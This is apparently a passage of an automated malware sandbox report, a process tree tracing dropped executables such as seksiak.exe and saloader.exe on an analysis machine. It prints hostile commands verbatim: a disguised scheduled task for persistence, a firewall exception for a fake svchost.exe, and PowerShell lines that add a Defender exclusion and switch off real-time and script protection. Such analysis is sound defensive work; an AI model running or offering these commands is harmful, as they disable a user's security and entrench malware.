- Runs ping.exe
PID:1112
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"15⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5576 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f16⤵
- Scheduled Task/Job: Scheduled Task
PID:5704
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PJRh4pdG23Iv.bat" "16⤵PID:5904
-
C:\Windows\system32\chcp.comchcp 6500117⤵PID:4344
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost17⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5788
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"17⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6084 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f18⤵
- Scheduled Task/Job: Scheduled Task
PID:1640
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zsO5UZ28rdvX.bat" "18⤵PID:5352
-
C:\Windows\system32\chcp.comchcp 6500119⤵PID:5720
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost19⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6108
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"19⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:7480 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f20⤵
- Scheduled Task/Job: Scheduled Task
PID:7628
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zoqG8UQtYUQh.bat" "20⤵PID:8012
-
C:\Windows\system32\chcp.comchcp 6500121⤵PID:7260
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost21⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7260
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"21⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6804 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f22⤵
- Scheduled Task/Job: Scheduled Task
PID:2908
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0b5hUosxtNCk.bat" "22⤵PID:9076
-
C:\Windows\system32\chcp.comchcp 6500123⤵PID:5732
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost23⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5992
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"23⤵
- Suspicious use of SetWindowsHookEx
PID:2148 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f24⤵
- Scheduled Task/Job: Scheduled Task
PID:7176
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bb8x3AKUPfAF.bat" "24⤵PID:7404
-
C:\Windows\system32\chcp.comchcp 6500125⤵PID:7472
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost25⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7516
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"25⤵
- Suspicious use of SetWindowsHookEx
PID:8632 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f26⤵
- Scheduled Task/Job: Scheduled Task
PID:8712
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\y9fxYwXVGDhD.bat" "26⤵PID:9136
-
C:\Windows\system32\chcp.comchcp 6500127⤵PID:8888
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost27⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8100
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"27⤵
- Suspicious use of SetWindowsHookEx
PID:5928 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f28⤵
- Scheduled Task/Job: Scheduled Task
PID:6344
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iYgHx5FZOdoE.bat" "28⤵PID:6492
-
C:\Windows\system32\chcp.comchcp 6500129⤵PID:6596
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost29⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6504
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"29⤵
- Suspicious use of SetWindowsHookEx
PID:984 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f30⤵
- Scheduled Task/Job: Scheduled Task
PID:4264
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1zypY6bemfcx.bat" "30⤵PID:7216
-
C:\Windows\system32\chcp.comchcp 6500131⤵PID:7324
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost31⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7372
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"31⤵
- Suspicious use of SetWindowsHookEx
PID:7404 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f32⤵
- Scheduled Task/Job: Scheduled Task
PID:8680
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ScdUdxDshekQ.bat" "32⤵PID:460
-
C:\Windows\system32\chcp.comchcp 6500133⤵PID:8500
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost33⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9088
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"33⤵
- Suspicious use of SetWindowsHookEx
PID:6804 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f34⤵
- Scheduled Task/Job: Scheduled Task
PID:5096
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oh1Yl5pYt2Ak.bat" "34⤵PID:8528
-
C:\Windows\system32\chcp.comchcp 6500135⤵PID:5884
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost35⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2580
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"35⤵
- Suspicious use of SetWindowsHookEx
PID:4628 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f36⤵
- Scheduled Task/Job: Scheduled Task
PID:7740
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LRAbFUCJmR5B.bat" "36⤵PID:220
-
C:\Windows\system32\chcp.comchcp 6500137⤵PID:3756
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost37⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3336
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"37⤵
- Suspicious use of SetWindowsHookEx
PID:3212 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f38⤵
- Scheduled Task/Job: Scheduled Task
PID:5528
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wdkLH3XKAfiN.bat" "38⤵PID:4344
-
C:\Windows\system32\chcp.comchcp 6500139⤵PID:4932
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost39⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3096
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"39⤵
- Suspicious use of SetWindowsHookEx
PID:6368 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f40⤵
- Scheduled Task/Job: Scheduled Task
PID:6380
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CcgenOwOqPdp.bat" "40⤵PID:6476
-
C:\Windows\system32\chcp.comchcp 6500141⤵PID:6736
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost41⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2788
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"41⤵
- Suspicious use of SetWindowsHookEx
PID:6684 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f42⤵
- Scheduled Task/Job: Scheduled Task
PID:1196
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\03VI5q6Kmq34.bat" "42⤵PID:2300
-
C:\Windows\system32\chcp.comchcp 6500143⤵PID:868
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost43⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7084
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"43⤵
- Suspicious use of SetWindowsHookEx
PID:6284 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f44⤵
- Scheduled Task/Job: Scheduled Task
PID:7228
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ODrbMLYk3K7K.bat" "44⤵PID:400
-
C:\Windows\system32\chcp.comchcp 6500145⤵PID:8776
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost45⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2572
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"45⤵
- Suspicious use of SetWindowsHookEx
PID:8052 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f46⤵
- Scheduled Task/Job: Scheduled Task
PID:7976
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SGh5VZUYxqi4.bat" "46⤵PID:6796
-
C:\Windows\system32\chcp.comchcp 6500147⤵PID:7732
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost47⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5872
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"47⤵
- Suspicious use of SetWindowsHookEx
PID:8496 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f48⤵
- Scheduled Task/Job: Scheduled Task
PID:3032
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VCvfBEbqKbrZ.bat" "48⤵PID:5416
-
C:\Windows\system32\chcp.comchcp 6500149⤵PID:2908
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost49⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5748
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"49⤵
- Suspicious use of SetWindowsHookEx
PID:4744 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f50⤵
- Scheduled Task/Job: Scheduled Task
PID:1136
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FBIw5GPNnp9P.bat" "50⤵PID:4476
-
C:\Windows\system32\chcp.comchcp 6500151⤵PID:1324
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost51⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6344
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"51⤵
- Suspicious use of SetWindowsHookEx
PID:5624 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f52⤵
- Scheduled Task/Job: Scheduled Task
PID:8452
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FMwNGHoLXveD.bat" "52⤵PID:2204
-
C:\Windows\system32\chcp.comchcp 6500153⤵PID:8360
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8356
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"53⤵
- Suspicious use of SetWindowsHookEx
PID:8128 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f54⤵
- Scheduled Task/Job: Scheduled Task
PID:1440
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\glZphPlWs3UF.bat" "54⤵PID:4876
-
C:\Windows\system32\chcp.comchcp 6500155⤵PID:7588
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost55⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8236
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"55⤵
- Suspicious use of SetWindowsHookEx
PID:4392 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f56⤵
- Scheduled Task/Job: Scheduled Task
PID:8704
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0izkJXH5hhBo.bat" "56⤵PID:7968
-
C:\Windows\system32\chcp.comchcp 6500157⤵PID:4116
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost57⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5224
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"57⤵
- Suspicious use of SetWindowsHookEx
PID:3080 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f58⤵
- Scheduled Task/Job: Scheduled Task
PID:7132
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bqirhtk1N1qp.bat" "58⤵PID:6044
-
C:\Windows\system32\chcp.comchcp 6500159⤵PID:4932
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost59⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5904
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"59⤵
- Suspicious use of SetWindowsHookEx
PID:8404 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f60⤵
- Scheduled Task/Job: Scheduled Task
PID:8452
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\i6JBQPQEmKXv.bat" "60⤵PID:8600
-
C:\Windows\system32\chcp.comchcp 6500161⤵PID:6592
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost61⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8488
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"61⤵
- Suspicious use of SetWindowsHookEx
PID:9208 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f62⤵
- Scheduled Task/Job: Scheduled Task
PID:1644
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FDS0JTm30ZjU.bat" "62⤵PID:8952
-
C:\Windows\system32\chcp.comchcp 6500163⤵PID:8224
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost63⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7896
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"63⤵
- Suspicious use of SetWindowsHookEx
PID:4760 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f64⤵
- Scheduled Task/Job: Scheduled Task
PID:8004
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\I7ocuNtmu8fQ.bat" "64⤵PID:5868
-
C:\Windows\system32\chcp.comchcp 6500165⤵PID:2304
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost65⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5520
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"65⤵
- Suspicious use of SetWindowsHookEx
PID:2768 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f66⤵
- Scheduled Task/Job: Scheduled Task
PID:7304
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aGpXRrC4q7RL.bat" "66⤵PID:5500
-
C:\Windows\system32\chcp.comchcp 6500167⤵PID:8200
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost67⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6728
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"67⤵
- Suspicious use of SetWindowsHookEx
PID:2960 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f68⤵
- Scheduled Task/Job: Scheduled Task
PID:8816
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9cHkrdvja9Fo.bat" "68⤵PID:7260
-
C:\Windows\system32\chcp.comchcp 6500169⤵PID:4068
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost69⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8516
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"69⤵
- Suspicious use of SetWindowsHookEx
PID:2276 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f70⤵
- Scheduled Task/Job: Scheduled Task
PID:3212
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KWPiiClZ8Aer.bat" "70⤵PID:5616
-
C:\Windows\system32\chcp.comchcp 6500171⤵PID:4292
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost71⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5148
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"71⤵
- Suspicious use of SetWindowsHookEx
PID:5136 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f72⤵
- Scheduled Task/Job: Scheduled Task
PID:8820
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KH9BawIgq5KR.bat" "72⤵PID:8296
-
C:\Windows\system32\chcp.comchcp 6500173⤵PID:5776
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost73⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8920
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"73⤵PID:6864
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f74⤵
- Scheduled Task/Job: Scheduled Task
PID:6952
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LXGW90reR8N2.bat" "74⤵PID:3872
-
C:\Windows\system32\chcp.comchcp 6500175⤵PID:712
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost75⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5292
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"75⤵
- Suspicious use of SetWindowsHookEx
PID:768 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f76⤵
- Scheduled Task/Job: Scheduled Task
PID:5348
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\G4A3DxGdT7GG.bat" "76⤵PID:8480
-
C:\Windows\system32\chcp.comchcp 6500177⤵PID:6200
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost77⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3712
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"77⤵
- Suspicious use of SetWindowsHookEx
PID:8356 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f78⤵
- Scheduled Task/Job: Scheduled Task
PID:2572
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DXR6wwJUWhMG.bat" "78⤵PID:5784
-
C:\Windows\system32\chcp.comchcp 6500179⤵PID:7316
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost79⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3800
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\dsd.exe"C:\Users\Admin\AppData\Local\Temp\a\dsd.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2740 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵
- Executes dropped EXE
PID:5052 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4504
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Loader.exe"C:\Users\Admin\AppData\Local\Temp\a\Loader.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4028
-
-
C:\Users\Admin\AppData\Local\Temp\a\output.exe"C:\Users\Admin\AppData\Local\Temp\a\output.exe"3⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Executes dropped EXE
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:3232
-
-
C:\Users\Admin\AppData\Local\Temp\a\saloader.exe"C:\Users\Admin\AppData\Local\Temp\a\saloader.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\a\saloader.exe"4⤵
- Views/modifies file attributes
PID:2464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\saloader.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3660
-
-
